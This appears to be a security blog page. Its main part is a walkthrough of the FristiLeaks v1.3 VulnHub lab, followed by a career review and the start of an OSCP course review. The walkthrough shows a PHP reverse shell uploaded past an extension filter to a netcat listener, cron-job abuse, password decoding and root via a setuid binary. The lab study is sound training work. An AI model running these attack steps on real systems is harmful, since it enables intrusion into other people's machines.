> woohoo, got pointer reuse > writev returned successfully. if this worked, you’ll have a root > shell in <=60 seconds. > suid file detected, launching rootshell… > we have root privs now… > root@red:/tmp/ebpf_mapfd_doubleput_exploit# id > uid=0(root) gid=0(root) groups=0(root),1005(SHayslett) There you go! I am now root Lastly, the flag.txt > root@red:/root# cat flag.txt > ~~~~~~~~~~<(Congratulations)>~~~~~~~~~~ > .-””’-. > |’—–‘| > |-…..-| > | |>
> | |>
> _,._ | | > __.o` o`”-. | | > .-O o `”-.o O )_,._ | | > ( o O o )–.-“`O o”-.`’—–‘` > ‘——–‘ ( o O o) > `———-` > b6b545dc11b7a270f4bad23432190c75162c4a2b ------------------------- If you like this post, please check out my other similar write-ups aswell:
* Write-up for FristiLeaks v1.3 * Write-up for Kioptrix: 2014 (#5) * Write-up for Kioptrix: Level 1.3 (#4) * Write-up for Kioptrix: Level 1.2 (#3) * Write-up for Kioptrix: Level 1.1 (#2) * Write-up for Kioptrix: Level 1 (#1)SHARE THIS:
* Click to share on LinkedIn (Opens in new window) * Click to share on Facebook (Opens in new window) * Click to share on Twitter (Opens in new window) * Click to share on WhatsApp (Opens in new window) * Click to share on Telegram (Opens in new window) * Click to share on Pocket (Opens in new window) * Click to share on Reddit (Opens in new window) * Click to share on Tumblr (Opens in new window) * Click to email this to a friend (Opens in new window)*
1 Comment
WRITE-UP FOR FRISTILEAKS V1.3December 31, 2017
Wen Bin KONG CTF
, Resources
CTF
, FristiLeaks
, privilege
escalation
,
Resources , tutorial, vm
, vulnhub
, writeup
To celebrate the end of 2017, I have decided to do a write-up on a VulnHub virtual machine (VM) like what I did for the Writeup for the Kioptrix series.
It has proved to be an effective exercise because apart from improving my writing and explanation skills, I also get to refresh the technical skills and techniques which I learnt previously while studying for my OSCP certification exams. Do read my OSCP/PWK course reviewif
you are intending to take your OSCP certification exams in 2018! Practice makes perfect As mentioned previouslyduring
my very first VulnHub write-up, the VMs on VulnHub were designed to be vulnerable, specifically created for security researchers or any security enthusiasts to conduct security testing on them. It is a good way to test your technical skills from identifying vulnerabilities when you encounter one, to crafting your own exploits or getting publicly available Proof of Concept (POC) to work.SETTING UP
In this write-up, we will be working on the FristiLeaks v1.3. Before we get
started, let’s manually modify the VM’s MAC address to _08:00:27_:A5:A6_:76_ as per instructed by the author.Instructions
for VMware Workstation users to modify MAC Address Written instructions for VMware Workstation users:* Import the OVA
* Click on Edit virtual machine settings * Under Hardware tab, click on Network Adapter * On the right section of the window, click on Advanced * In the pop-out window, insert the MAC address which the VM creatorhas instructed.
That’s it, now you can launch the VM.FristiLeaks v1.3
Please note that for the sake of writing this article, I have changed my VM’s Network Adapter settings to _NAT_ instead of the default “_Bridged_“, but there should be no difference for you to keep upwith the write-up.
HOST DISCOVERY
netdiscover -r 192.168.117.0/24 Looks like our target has been found to be hosted on 192.168.117.135. Do you find the MAC address familiar in some ways? 192.168.117.135 08:00:27:a5:a6:76 1 60 PCS Systemtechnik GmbHSERVICE DISCOVERY
nmap -sS -Pn -T4 -p- 192.168.117.135 Starting Nmap 7.50 ( https://nmap.org ) at 2017-12-16 22:59 +08 Nmap scan report for 192.168.117.135 Host is up (0.00038s latency). Not shown: 65534 filtered ports PORT STATE SERVICE 80/tcp open http MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC) ENUMERATION – PORT 80 Interesting, there is only 1 open port. Let’s scan the port 80 specifically using scripts: nmap -A -O -p80 192.168.117.135 Starting Nmap 7.50 ( https://nmap.org ) at 2017-12-16 23:21 +08 Nmap scan report for 192.168.117.135 Host is up (0.00029s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)| http-methods:
|_ Potentially risky methods: TRACE | http-robots.txt: 3 disallowed entries |_/cola /sisi /beer |_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3 |_http-title: Site doesn't have a title (text/html; charset=UTF-8). MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)buster.
dirb http://192.168.117.135password).
And there is this guy in the image that is going “Ha Ha” … Moving on, let’s run the directory buster again. dirb http://192.168.117.135/fristi/for now.
Since there is nothing else here, let’s go back and view the page source of the login page. As my colleague, Sven , has always told me when we are working on a project — always view the page source, never trust the rendered output. It’s very well said, as I have found several vulnerabilities on web applications that messed up because some developers did not expect their users to either view the page source on their web browser (e.g. Firefox users can right-click, view page source) or view the HTTP responses directly on a HTTP proxy server. Back to the write-up — indeed, the page source has several interesting stuff. For example, the meta description content ishilarious:
super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it. Also, the TODO comments are very interesting as well: There are two things that I can infer from reading this TODO list: There are two things that I could infer from reading this TODOlist:
* “eezeepz” is the name of the developer who created thisapplication.
* He is the type who write notes within the application. Assuming he uses “eezeepz” as his username, what could the password be? Going further down the page source, we can see that there is another chunk of base64 encoded content that was commented. Well, what could it be? To decode the base64 encoded content, I used NANO to make the content into a single line. It can be any other tools that you like – I need it to be a single line so I can conveniently use my terminal to run a command to decode it. base64 -d /tmp/encoded.txt Wow. Apparently, it is a PNG image file, as you can see in the very first line of characters. Seems like it somehow links back to the meta description content of “using base64 encoding for images”. First, we save it as a PNG file. base64 -d /tmp/encoded.txt > decoded.png Next, we render it and see what is in the image. Again, you can use any tools to do this. For me, I like to use FEH.feh decoded.png
Interesting… for some reason, the only correlation of things that I can use for this set of characters is probably someone’s password… Let’s try the following credentials on the login form:username:eezeepz
password:keKkeKKeKKeKkEkkEk Bingo!! Finally some progress! Looks like the only available function is the upload file feature. Now what? let’s conveniently upload a PHP reverse shell! GAINING LOW PRIVILEGE ACCESS SHELL Simply modify and use the one from kali. If you are not using kali, you can download the reverse shell source code here, created
by pentestmonkey.
cp /usr/share/webshells/php/php-reverse-shell.php reverse-shell.php vi reverse-shell.php Make the necessary changes to insert your own local IP address andlistening port.
Now setup a netcat listener to catch the connection.nc -nlvp 8888
Bad news! Only png, jpg, gif are allowed. Looks like things are not so easy after all. There are many ways to configure a file upload function. Developers should consider many different things. For instance, to prevent directory traversal, they should use base() or rename the file completely (use microtime() and some random numbers). Also, check the file type and size if there is any limitation to be enforced. The question now is, did the developer of this application implemented the file upload functionality correctly? Or is it only validating the file extension? What if I just add the .jpg extension to the php file, will it be able to bypass the validation filters? cp reverse-shell.php reverse-shell.php.jpg Since this is a VulnHub VM, there is no harm in trying things out! Weall learn.
Surprisingly (or maybe as expected), IT WORKS!! As hinted by the output, now is the time to go back to the “dead-end” that we have identified previously and walk the newlydiscovered path.
Render the following URL in your web browser: * http://192.168.117.135/fristi/uploads/reverse-shell.php.jpg After rendering the page, a reverse shell has been established on yourlocal machine!
root@kali:/tmp# nc -nlvp 8888 listening on 8888 ... connect to from (UNKNOWN) 41116 Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux 20:59:09 up 3:45, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=48(apache) gid=48(apache) groups=48(apache) sh: no job control in this shellsh-4.1$
Now you have a low privileged shell as user APACHE. PRIVILEGE ESCALATION As expected of a PHP reverse shell, the display is bad. It will repeat the characters, so the commands in screenshots from this point onwards may not be as accurate as it should be, but I will write the same command in the write-up, so don’t worry about it yeah. Now, let us perform privilege escalation. I will not write too much about the methodology and concepts of privilege escalation in this post, as I will be digressing too much. Let us go straight into finding the interesting information on this machine! The first thing you need to know is the environment that you are in. Run your favourite enumeration scripts, or you can do it manuallybased on this guide
written by g0tmi1k . It has been super useful during my journey towards obtaining OSCP certification.
KERNEL INFORMATION: Linux version 2.6.32-573.8.1.el6.x86_64 (mockbuild@c6b8.bsys.dev.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-16) (GCC) ) #1 SMP Tue Nov 10 18:01:38 UTC 2015 SPECIFIC RELEASE INFORMATION: CentOS release 6.7 (Final) INTERESTING SYSTEM USERS: root:x:0:0:root:/root:/bin/bash eezeepz:x:500:500::/home/eezeepz:/bin/bash admin:x:501:501::/home/admin:/bin/bash fristigod:x:502:502::/var/fristigod:/bin/bashfristi:x:503:100
PERMISSIONS IN /HOME DIRECTORY: drwxr-xr-x. 5 root root 4.0K Nov 19 2015 . dr-xr-xr-x. 22 root root 4.0K Dec 16 17:13 .. drwx------. 2 admin admin 4.0K Nov 19 2015 admin drwx---r-x. 5 eezeepz eezeepz 12K Nov 18 2015 eezeepz drwx------ 2 fristigod fristigod 4.0K Nov 19 2015 fristigod NETWORK INFORMATION Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN - tcp 0 0 192.168.117.135:41116 192.168.117.134:8888 ESTABLISHED 3001/sh tcp 0 0 :::80 :::* LISTEN - tcp 0 0 ::ffff:192.168.117.135:80 ::ffff:192.168.117.13:43296 ESTABLISHED -SOFTWARE VERSIONS
Sudo version:
Sudo version 1.8.6p3MYSQL VERSION:
mysql Ver 14.14 Distrib 5.1.73, for redhat-linux-gnu (x86_64) using readline 5.1APACHE VERSION:
Server version: Apache/2.2.15 (Unix) Server built: Aug 24 2015 17:52:49 In the above information, in your opinion, which is the mostinteresting ones?
For me, I would like to check the user directory:cd /home
ls *
Notice anything interesting in the output?.
.
.
Yes, you are probably right — let’s check out the text file at /HOME/EEZEEPZ/NOTES.TXT cat /home/eezeepz/notes.txtYo EZ,
I made it possible for you to do some automated checks, but I did only allow you access to /usr/bin/* system binaries. I did however copy a few extra often needed commands to my homedir: chmod, df, cat, echo, ps, grep, egrep so you can use thosefrom /home/admin/
Don't forget to specify the full path for each binary! Just put a file called "runthis" in /tmp/, each line one command. The output goes to the file "cronresult" in /tmp/. It should run every minute with my account privileges.- Jerry
Nice. Now we know that Jerry has put some of the useful binary files in his directory at /HOME/ADMIN, and we can execute those binaries under his (ROOT) privilege by creating a file called “RUNTHIS” in the /TMP/ directory. Let’s try if we can spawn a reverse shell with root privilege usingthis cron job!
Set up a listener just like before and create the “runthis” file._It did not work._
Every minute, the cron job will execute the commands in RUNTHIS and update the CRONRESULTS file located within /TMP/ directory. The current results are the following: command did not start with /home/admin or /usr/bin As such, it is not possible to directly spawn a reverse shell like that. We need to do it using another method. Just to test it out, let’s try running the following command to verify that the cronjob is working fine: /home/admin/chmod 777 /home/admin So apparently, _it works_!total 20
drwxrwxrwx. 2 admin admin 4096 Nov 19 2015 admin drwx---r-x. 5 eezeepz eezeepz 12288 Nov 18 2015 eezeepz drwx------ 2 fristigod fristigod 4096 Nov 19 2015 fristigod Awesome! Now we can read the content in the /HOME/ADMIN directory.bash-4.1$ ls -l
total 632
-rwxr-xr-x 1 admin admin 45224 Nov 18 2015 cat -rwxr-xr-x 1 admin admin 48712 Nov 18 2015 chmod -rw-r--r-- 1 admin admin 737 Nov 18 2015 cronjob.py -rw-r--r-- 1 admin admin 21 Nov 18 2015 cryptedpass.txt -rw-r--r-- 1 admin admin 258 Nov 18 2015 cryptpass.py -rwxr-xr-x 1 admin admin 90544 Nov 18 2015 df -rwxr-xr-x 1 admin admin 24136 Nov 18 2015 echo -rwxr-xr-x 1 admin admin 163600 Nov 18 2015 egrep -rwxr-xr-x 1 admin admin 163600 Nov 18 2015 grep -rwxr-xr-x 1 admin admin 85304 Nov 18 2015 ps -rw-r--r-- 1 fristigod fristigod 25 Nov 19 2015 whoisyourgodnow.txt Here are some interesting files that can be identified in the /HOME/ADMIN directory:* cryptpass.py
* cryptedpass.txt
* whoisyourgodnow.txt First, the content of CRYPTPASS.PY: bash-4.1$ cat cryptpass.py #Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn import base64,codecs,sys def encodeString(str): base64string= base64.b64encode(str) return codecs.encode(base64string, 'rot13') cryptoResult=encodeString(sys.argv)print cryptoResult
Next, the content of CRYPTEDPASS.TXT: bash-4.1$ cat cryptedpass.txt mVGZ3O3omkJLmy2pcuTq Lastly, the content of WHOISYOURGODNOW.TXT: bash-4.1$ cat whoisyourgodnow.txt =RFn0AKnlMHMPIzpyuTI0ITG It is not difficult to guess that the python script was used to produce the content in CRYPTEDPASS.TXT and most likely also the WHOISYOURGODNOW.TXT. Based on the source code of CRYPTPASS.PY, I wrote a decode function to do the reverse of CRYPTPASS.PY, let’s call it DECRYPTPASS.PY and here’s the full source code: https://gist.github.com/kongwenbin/8551e2665f6be6e7083a182efbb7f10e By the way, I wrote the script locally before transferring it over using WGET. Please feel free to write it directly on the machine toyour liking!
After executing the commands, you will get 2 sets of passwords for each of the “encrypted” text from before. * mVGZ3O3omkJLmy2pcuTq becomes thisisalsopw123 * =RFn0AKnlMHMPIzpyuTI0ITG becomes LetThereBeFristi! I am very sure that LETTHEREBEFRISTI! is the password for user“FRISTIGOD”.
Let’s continue our privilege escalation, this time to “FRISTIGOD” since it is the only folder within the /HOME directory that we do not currently have any access to until now. Something inside there might give us ROOT access. Run the following command to switch user to fristigod:su - fristigod
standard in must be a tty This happens because this is not a full shell. To resolve this issue, simply spawn a tty yourself (straightforward enough). python -c 'import pty;pty.spawn("/bin/bashu - fristigod Password: LetThereBeFristi!id
uid=502(fristigod) gid=502(fristigod) groups=502(fristigod) Nice, we are now user “fristigod”! Once again, check our home directory:pwd
/var/fristigod
ls -la
total 16
drwxr-x--- 3 fristigod fristigod 4096 Nov 25 2015 . drwxr-xr-x. 19 root root 4096 Nov 19 2015 .. -rw------- 1 fristigod fristigod 864 Nov 25 2015 .bash_history drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25 2015 .secret_admin_stuff Noticed something interesting? There is a directory named .SECRET_ADMIN_STUFF cd .secret_admin_stuffls -la
total 16
drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25 2015 . drwxr-x--- 3 fristigod fristigod 4096 Nov 25 2015 .. -rwsr-sr-x 1 root root 7529 Nov 25 2015 doCom./doCom
Nice try, but wrong user ;) As kindly hinted by the error message, I might be using the binary file in a wrong way. Let’s try to find out more about the usage of this doCom, as this is most likely the gateway to make us root. It can already run programs as root (see its permissions!). Reviewing the /VAR/FRISTIGOD/.BASH_HISTORY file to find clues on how to use the doCom file.cat .bash_history
ls
pwd
ls -lah
cd .secret_admin_stuff/ls
./doCom
./doCom test
sudo ls
exit
cd .secret_admin_stuff/ls
./doCom
sudo -u fristi ./doCom ls / sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls / sudo -u fristi /var/fristigod/.secret_admin_stuff/doComexit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doComexit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom sudo /var/fristigod/.secret_admin_stuff/doComexit
sudo /var/fristigod/.secret_admin_stuff/doCom sudo -u fristi /var/fristigod/.secret_admin_stuff/doComexit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doComexit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doComgroups
ls -lah
usermod -G fristigod fristiexit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom less /var/log/secure eFexit
exit
exit
Did you notice that the “fristigod” user is always running the following sudo command? sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom Seems like we have to run that same command as well, before we can attempt to execute any other commands. To verify this, simply run the following command:sudo -l
Let’s try it out:
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom id uid=0(root) gid=100(users) groups=100(users),502(fristigod) Wow, that was amazing. So, what else can I run? If I can run the ID command like above, can I directly spawn myself aSHELL?
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash uid=0(root) gid=100(users) groups=100(users),502(fristigod) Perfect! Now we can go to the /ROOT directory to check out the flagcd /root
ls -la
VulnHub VM!
Thanks for following my write-up, I hope that it has been useful to you and helped you learn something new — be it the thought process or the approach towards hacking a box like this. Also, I would say that this a very good practice machine for folks who intended to take up the OSCP certification.
If you are still on the verge of deciding, check out my OSCP/PWKcourse review
,
it might be helpful to you. Lastly, thanks Ar0xA for creating this VM, it was fun! Also thanks VulnHub for providing a platform for people to create and upload such CTF alike practice VMs for the community. If you like this write-up, do also check out my other write-ups on theKioptrix series
as well.
* Write-up for Kioptrix: Level 1 (#1) * Write-up for Kioptrix: Level 1.1 (#2) * Write-up for Kioptrix: Level 1.2 (#3) * Write-up for Kioptrix: Level 1.3 (#4) * Write-up for Kioptrix: 2014 (#5)SHARE THIS:
* Click to share on LinkedIn (Opens in new window) * Click to share on Facebook (Opens in new window) * Click to share on Twitter (Opens in new window) * Click to share on WhatsApp (Opens in new window) * Click to share on Telegram (Opens in new window) * Click to share on Pocket (Opens in new window) * Click to share on Reddit (Opens in new window) * Click to share on Tumblr (Opens in new window) * Click to email this to a friend (Opens in new window)*
2 Comments
A REVIEW OF MY PAST ONE-YEAR IN INFORMATION SECURITY November 5, 2017November 10, 2017Wen Bin KONG
General , Reviews
A review of my past one-year in Information Security Last week, I had my one-year anniversary in the Information Security industry, doing work related to the offensive aspect of security. Surprisingly, it has already been a year since I left my previous role from a local bank and pursued my interest in Information Security. Time really flies… The purpose of this blog is to document my learning journey, but I have neglected it for a few months due to hectic workload from various sources, however, the good news is that I have decided to consciously remind myself to update it more often moving forward! Well, make it a “new year resolution”! Now, back to the review…WORK
Being part of an awesome team at Vantage Point Security , I have been given the opportunity to perform technical security assessment on various organisations in Singapore as a qualified Security Consultant. I was privileged to perform manual security penetration testing on various types of web and mobile applications that belongs to renowned organisations, such as some of the best financial institutions and telecommunication companies in the region. Something interesting is that I am usually a customer of my clients, which makes me really appreciate it when I see them taking security seriously and strive to improve for the better. Overall, I find it very meaningful to be part of this ecosystem in making products better and safer for people – it makes me appreciate the things I am doingand keep me going!
A special shout-out to my mentor, Paul Craig, Sven Schleier
, Jin Kun
and Ryan Teoh
for making my past one-year such an awesome journey of learning! I have learnt so much from them. It is always great to be able to work alongside people who are motivated and passionate about security. I am looking forward to doing even greater stuff together in the year ahead! Always ready to give a high-five to fellow security enthusiasts!CERTIFICATIONS
I have managed to achieve the very first milestone of most penetration testers, Offensive Security Certified Professional (OSCP),
after having completed 3-months of intensive lab hands-on practices in its recommended course, Penetration Testing with Kali (PWK).
I have also written a blog post about my experience gained during the 3-months period, in hope that it will be helpful to fellow like-minded aspiring security enthusiasts. If you are interested, please check out My OSCP / PWK Course Review.
Besides OSCP, I have also gotten myself the following certifications in the past one-year: * CREST Practitioner Security Analyst (CPSA) * CREST Registered Penetration Tester (CRT Pen) * EC-Council Certified Ethical Hacker v9 (CEH) > “CREST is a not for profit organisation that serves the needs of a > technical information security marketplace that requires the > services of a regulated professional services industry.” ~ > directly quoted from CREST>
From my observations, I see that CREST has been very successful in becoming the go-to quality assurance organisations in Singapore when it comes to selecting vendors to work with, be it the government agencies, financial institutions or organisations from other industries. Something I like about them is that they are conducting proctored examinations, which can solve a lot of “problems” caused by people with no ethics value. It is a huge problem occurring around the world, which I am not going to cover in this post – maybe next time (I got to stay on track!). To me, certification is one of the many forms of (technical) quality assurance that a consultant can provide to their clients before engaging them on any security assessment projects. While being certified is a good thing, quality is always better than quantity. It is essential to put the skills you learnt into practice, or it will be just another piece of paper. If you don’t put your skills into practice, it will just be anotherpiece of paper
BUG HUNTING
My experiences in bug hunting have been some of the most devastating yet delightful moment of my past one-year. When I learnt about the existence of “Bug Bounty Program” (e.g. Bugcrowdand HackerOne
), I was both surprised and excited, thinking how it could be fun to be able to find bugs on the internet and get rewarded for it. It sounded really enticing at first, especially with the thoughts that since I have been testing web and mobile applications to earn a living, it should be easy for me. However, it doesn’t take long for me to realise how naive I was to even think that way – we are talking about the internet, man! Any low hanging fruits would have already been discovered by someone else, there is nothing left lying around for me to “hunt”. Well, I thought it would be easy, but… On a positive note, this simple realisation has motivated me to keep up my pace in learning all kinds of “new stuff” that are happening in the internet, such as to research on the security mechanisms and implementation of various popular web applications, development frameworks, content management systems, penetration testing techniques such as bypassing a Web Application Firewall (WAF) etc. and many moreinteresting stuffs.
Nowadays, I still do bug hunting whenever I get some free time before I turn in for the night, or during some random weekends. Did you noticed that I call it “Bug Hunting” instead of “Bug Bounty”? That is because I don’t only focus on programs that give monetary rewards to security researchers. I work on any programs that I find it meaningful and reasonable to test, such as companies that I personally use their products or companies that give a clearly defined scope on their Responsible Disclosureor Bug Bounty
Programs.
Just playing my part in making the world a better place While it may sound cheesy to say that I want to make the world and the internet a safer place for everyone, sometimes people just want to do things that they themselves feel is meaningful, worthwhile, and can make themselves feel good. Personally, to find bugs, disclose them responsibly to the vendor and getting them fixed, is something that makes me feel that way. I am still learning and trying to get better every day. I urge all aspiring bug hunters to create a Twitter account and start following fellow bug hunters and learn from one another. As mentioned earlier, I will start posting more write-ups in my next one-year, so stay tuned! Besides reading the write-ups from fellow bug hunters, I also recommend reading the publicly disclosed bugs from sources such as the HackerOneHacktivity
or other unofficial sources such as this and this . One of the best bug bounty tips that I have come across so far is to keep trying, keep learning, andnever give up.
Keep learning, and never give up. I have had my fair share of achievement over the past one-year and I feel really honored to be recognized by the 10 following organisations and have myself enlisted on their Security Researcher Hall of Fame:* Netflix
* Nokia
* Adobe
* Sophos
* CERT-EU
* Bitdefender
* Jet.com
* Schuberg Philis
* Silent Circle
* Constant Contact
While I cannot disclose the details of the vulnerabilities that I have discovered, I might write a blog post next time on some of them – with all information masked, of course. Official recognition from NetflixSECURITY RESEARCH
> Life is full of challenges, it is how you responded to them that > makes a difference to your life ~ Source>
We security folks always challenge ourselves in many things – some people challenge themselves to earn 50k in slightly over 1 month,
some people challenge themselves to earn 30k in 30 days–
we all like to set milestones and work towards it. For me, I am not at their level yet, but one-year ago, I told myself that I want to find azero-day too. It
seems impossible at first, but I was inspired by one of my colleague, Bernhard Mueller , during one of the project engagement that we did together and made me felt that I can do it too. The influence is real. I would download the same software or application development framework and look for zero-days; this is something that I will not do in the past. He have also written and article about why you should be looking for zero-day vulnerabilities during penetration testing.
As time goes by, it has become a habit for me to look for zero-days during penetration testing engagement as well. Recognition from TIBCO for CVE-2017-5528 Of course, it is easier said than done. Most of these commercial and/or open source software were already being thoroughly tested prior to their releases, so it is very difficult to find any legitimate bugs in them. I have gone through my fair share of hardships, gained tons of knowledge along the way as I constantly failed and was ultimately lucky to have found a few zero-day vulnerabilities on some commercial products used by large enterprises.* CVE-2017-5528
–
TIBCO – JasperReports Server cross-site vulnerabilities It is worth mentioning that TIBCO is an organisation that values security. They take security report seriously and replies promptly to security researchers. It was great communicating with them. * CVE-2017-8042 – Pivotal – Stored Cross-site scripting (XSS) vulnerability in Spring Batch Admin before 1.3.0 * CVE-2017-8043 – Pivotal – Cross-site request forgery (CSRF) vulnerability in the Spring Batch Admin before 1.3.0 Both of the above issues were reported in March 2017 and has been confirmed by Pivotal that they will not be addressing them as the software is going to reach End-Of-Life (EOL) by the end of 2017. The recommendation is for users to migrate to another product, Data Flow. They have recently put up a noticetoo.
Currently, both CVE trackers are pending Pivotal to publish them online, they have not confirmed a date yet. While they were not high-severity vulnerabilities that could lead to Remote Code Execution (RCE), they were good enough of a start for me. They were genuine bugs on the software, undiscovered and hence left exploitable by malicious attackers, and my research/report did helped the software company to improve their products, which are used by many enterprises all over the world. Good enough, but try harder next time, don’t be contented. It’sonly a start.
Next up is an interesting bug that I found while working on one of the private BB program. They are using the PRTG Network Monitor , which is an application that help organisations to monitor their systems, devices, traffic and applications that are using common technologies like SNMP, WMI, SSH, and many more. I shall restrain from providing too much information for now, maybe a write-up after the latest version and release notes has been officially released. * CVE-2017-????? – Paessler AG – pending security patch andrelease notes
Photo of myself at the Cybersecurity Camp @ Singapore 2017 – Source Lastly, I attended the Cybersecurity Camp @ Singapore 2017 which was organised by the Singapore Cybersecurity Consortium (SGCSC) earlier this year and learnt about fuzz testing for finding vulnerabilities. Having equipped with this knowledge and its theoretical understanding for a few months, I finally put them into practice after being encouraged by Jin Kun as he shared his own success story of having discovered many zero-day vulnerabilities through fuzzing. Being inspired and motivated to do my own fuzzing as well, I learnt many things along the way, specific to how to fuzz an application efficiently, how to fuzz an application library, how to optimize my virtual machines processes for better performances, how to fine-tune my fuzzer, how does different fuzzers mutate or identify different paths within an application flow, how to compile binaries using different compilers and buildsystem, how to analyse a crash, and many more interesting stuff that I never thought I would learn. After some time of fuzzing, I have discovered 3 CVEs on BinChunker, the issues has been fixed and changes are being pushed to various Linux distros as I am writing this blog post.* CVE-2017-15953
–
BinChunker – Heap-based buffer overflow* CVE-2017-15954
–
BinChunker – Heap-based buffer overflow* CVE-2017-15955
–
BinChunker – Memory Access Violation There will be a short write-up on this soon.While BinChunker
is not a very popular tool based on Debian popularity conteststatistics and
there was no RCE exploit developed for the discovered vulnerabilities, it was very satisfying. I really enjoyed the experience from discovering these vulnerabilities to reporting them and eventually getting them fixed. It’s great to see how people react and appreciate the findings you discovered and then work together to fix the problem as a team. Information Security is a super awesome community where people help one another to make things better!COMMUNITY PROJECTS
Have you checked out the OWASP Mobile Security Testing Guide (MSTG) already? If you have not, thenyou probably should
.
The MSTG is a comprehensive manual for mobile application security testing and reverse engineering. It describes the technical processes for verifying the controls listed in the OWASP Mobile Application Verification Standard (MASVS) . You can also read it on Gitbookor
download it as an e-book.
Main Deliverables of the OWASP Mobile Security Testing Guide I was fortunate to work alongside the project leaders of MSTG at work and since I know nothing about mobile application security testing back then, I was highly encouraged by Bernhard to use the MSTG as my “study material” and if I find anything missing, I can research on them separately and contribute to this community project by submitting a Pull request. Well, it makes sense – since I am going to research on those things to learn anyway, why not share the knowledge with the community and help fellow aspiring security enthusiast in theirlearning as well?
With consistent contribution of quality content for a few months, I am humbled to be acknowledged as one of the “Top Contributor” for the
OWASP MSTG project. If you are someone whom is interested in mobile application security, I highly encourage you to read through the content and create a pull request if you find anything missing. Once you start submitting those pull requests, they can become quiteaddictive.
ACADEMIC
This is the last section of the review. Some of my friends know that I am currently a part-time student enrolled in Master of Computing(Infocomm Security)
at National University of Singapore (NUS). My first semester was hectic, having not been studying academic syllabus since graduated in 2014, however, things went well thanks to the support of family and friends (special shout-out to Zhan Teng, Julian Tan and Jiqing for being super awesome teammates!). The second semester is coming to an end soon and of course, with tons of submission deadlines to meet in the next few weeks and a few exams to clear! Android Booting Process Other things worth mentioning are some of the more interesting homework that I did this semester for one of my module, CS5231 – System Security, taught by Professor Liang Zhenkai. Usually when I root an android device, I use readily available tools and does not have a clear understanding about what really happened under the belly. In order to complete one of the tasks in the homework, I was being forced to step out of my comfort zone and dive into how android really works, how the rooting of android is being performed, what are the various methods to root an android device and eventually also created my own custom Over-The-Air (OTA) package to perform code execution as root; to fire up my own daemon service that can help to spawn a root shell to my client upon request. CONCLUSION / TO-DO FOR THE NEXT YEAR Without knowing, this blog post has turned out to be a long article. Personally, I find it worthwhile and meaningful to just sit down, think-through and review about what I have done in my past one-year in the industry of Information Security. I feel that everyone should do something similar and then think about what they want to do in thenext one-year.
Think about some of the things that you want to achieve in the nextone-year
The reason for me to post this article is also to put some pressure on myself and make sure that I achieve the goals which I said that I want to achieve in the next one-year. Next year, I am going to look back at this article and question myself. In the next one-year, I intend to work on other CREST certifications, such as the CREST Certified Infrastructure Tester (CCT INF) and/or CREST Certified Web Applications Tester (CCT APP).
Like I mentioned above as well, I like how they are conducting proctored examinations here in Singapore and I find that they can be great milestones to challenge myself in the next one-year. Another certification which I am looking forward to challenge myself with is the Offensive Security Certified Expert (OSCE),
which I intend to sign up for its course, Cracking the Perimeter (CTP),
in the next few months. I need to try harder! #TryHarder I got to try harder! In view of the OSCE certification goal, I hope to focus more on low-level stuff, such as to improve my exploitation techniques, exploit development skills, etc., which are things that I don’t have much experience with now, but are useful skills which I am very keento pick up.
In the next one-year, I hope to continue to hunt for bugs and keep up with the learning. I also aim to post write-ups on any interesting bugs, if I am given the permission to do so. Other things are write-up on CTF labs such as the Bandit fromOverTheWire
and
practice machines such as Kioptrix from Vulnhub.
For work, apart from Web Application and Mobile Application penetration testing, I hope that I can have opportunities to gain more exposure across the Asia region and get myself involved in different types of engagements, such as ATM Hacking, Red Teaming and Wireless Hacking. There are so many things to learn, I can’t wait anymore! I need to be more productive… I also aim to develop my own Burp Extender module that can help to improve my productivity. At least my first extender module should not be too complicated, I just need to get started with something, start small, gain the knowledge and momentum before targeting something more complicated. If you have any interesting ideas that are not too complicated, please share in the comments section. Lastly, as part of my Master course requirements, I need to complete a one-semester long research project (3-months duration). I can choose between an academic project proposed by one of the NUS professor, or an industrial project proposed by a company in the industry. I have not chosen any topics yet, but I hope that I can work on something useful to my field of work, to not only clear my course requirements, but also allow me to learn practical techniques and knowledge that are relevant to my area of interest. That way, I will have enough interest to continue to work on it after the 3-months duration. If there is any potential projects related to offensive side of security and not too complicated/simple, I would love to know it. If you have read this entire post, you deserve a medal, just like thiscamera man
I hope that the next one-year will be even better and full of learning opportunities for me! Till I blog again.SHARE THIS:
* Click to share on LinkedIn (Opens in new window) * Click to share on Facebook (Opens in new window) * Click to share on Twitter (Opens in new window) * Click to share on WhatsApp (Opens in new window) * Click to share on Telegram (Opens in new window) * Click to share on Pocket (Opens in new window) * Click to share on Reddit (Opens in new window) * Click to share on Tumblr (Opens in new window) * Click to email this to a friend (Opens in new window)*
Leave a comment
MY OSCP / PWK COURSE REVIEW February 23, 2017November 5, 2017Wen Bin KONG
General ,
Resources ,
Reviews , Tips
certification
, certs
, exams
, oscp
It have been a tough 3 months of virtual lab and hands-on training – so much learning, and I mean, _intensive learning; _combo with many sleepless nights and so much sweat and tears (maybe not the tears part but you get the point), I have finally passed myOSCP!
